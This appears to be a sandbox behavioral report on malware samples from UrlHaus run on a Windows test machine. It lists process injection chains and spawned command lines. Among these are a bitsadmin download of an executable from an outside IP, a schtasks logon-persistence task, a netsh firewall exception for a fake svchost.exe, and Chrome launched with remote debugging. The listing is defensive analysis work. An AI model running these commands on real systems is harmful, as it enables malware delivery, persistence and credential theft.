Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2468 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2468 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 3604 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3604 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3604 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3604 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
PID 3604 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
PID 3604 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
PID 5012 wrote to memory of 524 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\ping.exe
PID 5012 wrote to memory of 524 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\ping.exe
PID 5012 wrote to memory of 524 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\ping.exe
PID 5012 wrote to memory of 4580 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 5012 wrote to memory of 4580 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 5012 wrote to memory of 4580 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 3604 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
PID 3604 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
PID 3604 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
PID 232 wrote to memory of 2368 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 232 wrote to memory of 2368 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 232 wrote to memory of 2368 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 3604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\langla.exe
PID 3604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\langla.exe
PID 3604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\langla.exe
PID 3604 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3604 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3604 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3604 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 3604 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 3604 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 3604 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\22.exe
PID 3604 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\22.exe
PID 2120 wrote to memory of 5056 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 5056 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 5056 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 916 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 916 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 916 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 5056 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5056 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5056 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 916 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 916 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 916 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2368 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 2368 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 2368 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 3604 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Windows\System32\notepad.exe
PID 916 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\http.exe
PID 916 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\http.exe
PID 916 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\http.exe
PID 1004 wrote to memory of 932 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1004 wrote to memory of 932 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 932 wrote to memory of 3008 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe"

C:\Windows\SysWOW64\ping.exe

ping -n 1 8.8.8.8

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"

C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\langla.exe

"C:\Users\Admin\Downloads\UrlHausFiles\langla.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\22.exe

"C:\Users\Admin\Downloads\UrlHausFiles\22.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE81E.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"

C:\Users\Admin\AppData\Roaming\http.exe

"C:\Users\Admin\AppData\Roaming\http.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffeaf67cc40,0x7ffeaf67cc4c,0x7ffeaf67cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1864,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2456 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4596 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4664 /prefetch:8

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4656,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5112,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5344 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4896,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5336 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5520,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5484 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D69.tmp\D6A.tmp\D6B.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\mshta.exe

